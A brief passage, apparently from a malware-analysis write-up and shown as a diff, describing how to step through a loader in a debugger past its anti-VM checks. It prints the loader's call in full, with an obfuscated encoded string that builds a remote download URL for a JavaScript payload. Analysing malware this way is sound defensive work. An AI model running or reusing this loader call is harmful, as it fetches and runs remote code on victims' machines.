Post

 [ClassLibrary1.Home]::VAI('0hHduIzYzIDN4MDMxcTY4MjY2gDM2QGN3gDO1MzNiJDM1ETZf9mdpVXcyF2Lt92Yuc2bsJ2b0NXZ29GbuQnchR3cs92bwRWYlR2LvoDc0RHa', '1', 'C:\Users\Public\Downloads', 'agnosticism', 'jsc', '', '', '', '', '', '', 'js', '', '', '', '2', '');

-Once we hit our initial breakpoint, we can navigate to our second breakpoint, right-click, and select “Set Next Statement” to skip past argument parsing and anti-vm checks.
+Once we hit our initial breakpoint, we can right-click the line where download logic begins and click “Set Next Statement” to skip past argument parsing and anti-vm checks.

 After stepping through the code, we see a URL string is crafted using the first parameter passed to VAI().